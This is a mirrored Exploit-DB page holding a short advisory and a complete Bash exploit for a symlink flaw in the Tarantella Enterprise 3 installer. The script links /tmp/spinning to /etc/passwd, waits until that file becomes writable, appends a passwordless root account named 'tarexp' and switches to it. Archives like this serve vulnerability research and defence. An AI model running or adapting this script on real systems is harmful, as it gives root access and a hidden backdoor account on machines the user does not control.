bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/unix/local/21290.sh
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
1,008 B
Bash
Executable file
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/4115/info
Tarantella Enterprise 3 contains a locally exploitable symbolic link vulnerability during it's installation procedure.
This vulnerability can be exploited to elevate privileges. An attacker anticipating the install of Tarantella could create a symbolic link to any file as '/tmp/spinning'. When the installation utility is run, the file pointed to by the link will be made world writeable.
The attacker may gain root privileges by overwriting a file such as '/etc/passwd'.
#!/bin/bash
#Larry W. Cashdollar lwc@vapid.dhs.org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux. run and wait.
echo "Creating symlink."
/bin/ln -s /etc/passwd /tmp/spinning
echo "Waiting for tarantella installation."
while true
do
echo -n .
if [ -w /etc/passwd ]
then
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
su - tarexp
exit
fi
done
Reference in a new issue View git blame Copy permalink